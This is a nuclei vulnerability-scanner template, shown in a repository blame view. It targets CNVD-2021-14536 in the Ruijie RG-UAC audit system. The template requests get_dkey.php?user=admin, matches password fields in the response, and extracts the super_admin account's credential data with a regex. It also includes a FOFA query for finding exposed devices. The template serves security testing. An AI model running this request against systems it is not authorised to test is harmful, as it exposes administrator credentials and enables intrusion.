daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cnvd/2021/CNVD-2021-14536.yaml

39 lines
997 B
YAML
Raw Normal View History

Create CNVD-2021-14536.yaml
2022-03-19 00:26:23 +00:00
id: CNVD-2021-14536
info:
name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure
author: daffainfo
Update CNVD-2021-14536.yaml
2022-03-21 08:47:04 +00:00
severity: high
Update CNVD-2021-14536.yaml
2022-03-21 08:48:53 +00:00
description: Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.
Create CNVD-2021-14536.yaml
2022-03-19 00:26:23 +00:00
reference: https://www.adminxe.com/2163.html
Update CNVD-2021-14536.yaml
2022-03-21 08:47:04 +00:00
metadata:
fofa-query: title="RG-UAC登录页面"
tags: ruijie,cnvd,cnvd2021,disclosure
Create CNVD-2021-14536.yaml
2022-03-19 00:26:23 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/get_dkey.php?user=admin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"pre_define"'
- '"auth_method"'
- '"name"'
- '"password"'
condition: and
- type: status
status:
- 200
Update CNVD-2021-14536.yaml
2022-03-21 08:47:04 +00:00
extractors:
- type: regex
part: body
group: 1
regex:
- '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":'